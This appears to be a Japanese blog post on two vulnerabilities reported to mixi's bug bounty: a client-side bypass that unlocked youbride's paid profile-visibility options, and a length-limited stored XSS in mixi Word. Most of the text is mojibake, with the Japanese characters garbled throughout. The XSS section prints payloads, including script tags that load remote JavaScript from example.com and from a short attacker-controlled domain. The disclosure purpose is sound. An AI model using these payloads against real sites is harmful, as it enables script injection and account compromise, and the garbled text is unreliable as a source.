mixiã«å ±åããèå¼±æ§2
mixiの脆弱性報告制度ï¼ãã§ã«çµäºãã¦ããï¼ã§å ±åãã¦ãä¿®æ£ãããèå¼±æ§ã
youbrideã®æææ©è½ãç¡æã§ä½¿ããåé¡
- 2014/03/12 å ±å
- 2014/03/18 ä¿®æ£å®äº
- 2014/03/24 75,000åã®Amazonã®ãããå±ãã
youbrideã¯mixiã®åä¼ç¤¾ã®æ ªå¼ä¼ç¤¾Diverseãéå¶ããå©æ´»ãµã¤ããä¸æãå¶åº¦ã®å¯¾è±¡ã ã£ãã
youbrideã§ã¯ç¡æã¦ã¼ã¶ã¼ã¯ãããã£ã¼ã«ã®å
¬éæ¡ä»¶ã¯ãå
¨ä½ã«å
¬éãããé¸ã¹ãªãã
Chromeã®Developer Toolã§ä»ã®é¸æè¢ãæå¹ã«ãããããå
¨ä½ã«å
¬éã以å¤ã®å
¬éæ¡ä»¶ãé¸ã¹ã¦ãã¾ã£ãã
mixiã¯ã¼ãã®XSS
- 2014/03/31 å ±å
- 2014/03/31 ä¿®æ£å®äº
- 2014/04/09 125,000åã®Amazonã®ãããå±ãã
mixiワードã«XSSå¯è½ãªèå¼±æ§ããã£ãã
ãç«ãã«ã¯ããã£ããã¿ã¯ã¼ããã£ãããã¼ããç«ã®é親åéãæ¨ã¦ç«ãåç«ãã¤ã«ã«ããã³ã®ã³ãªã©ã®ã¯ã¼ããé¢é£ãã¦ãããâ¦
ã®é¨åãmixiã¯ã¼ãã¯ã³ãã¥ããã£ãä½æããé¢é£ã¯ã¼ããã追å ã§ãããåºåæã«ã¯ä½ãã¨ã¹ã±ã¼ããããªãããã©ãæåæ°ã30æå以å ã/, (, )ãªã©ãå ¨è§æåã«å¤æãããã¨ããå¶éãããã
<script>alert(0)</script>
ã¨ããããã«ã¹ã¯ãªãããåãè¾¼ããã¨ãã¦ããscriptã¿ã°ãéããããªããå¾ç¶ã®æåãã¹ã¯ãªããã¨ãã¦èªèãããã¨ææ³çã«ã¨ã©ã¼ã«ãªã£ã¦ã¹ã¯ãªãããåããªããã¹ã¯ãªããä¸ã§()ã使ããªãã®ãã¤ããã
<script src="http://example.com/malicious.js">
ã¨å¤é¨ã®ã¹ã¯ãªãããèªã¿è¾¼ããã«ã/ã使ããªãã
çã
<script src=//ã¤ã.net>
27æåãå±æ§å¤ãªãã°å®ä½åç §ã使ãããçããã¡ã¤ã³ãæã£ã¦ãã¦è¯ãã£ããå ±åããã¨ãã¯ãã¤ã.netã®ããããã¼ã¸ãJavaScriptãè¿ãããã«ãããã¡ãªã¿ã«ãmixiã¯ã¼ãã¯ä¸åº¦ä½ã£ããæ¶ããªãããããå¤ãªã¯ã¼ããä½ã£ã¦ãã¾ã£ã¦ç³ã訳ãªãã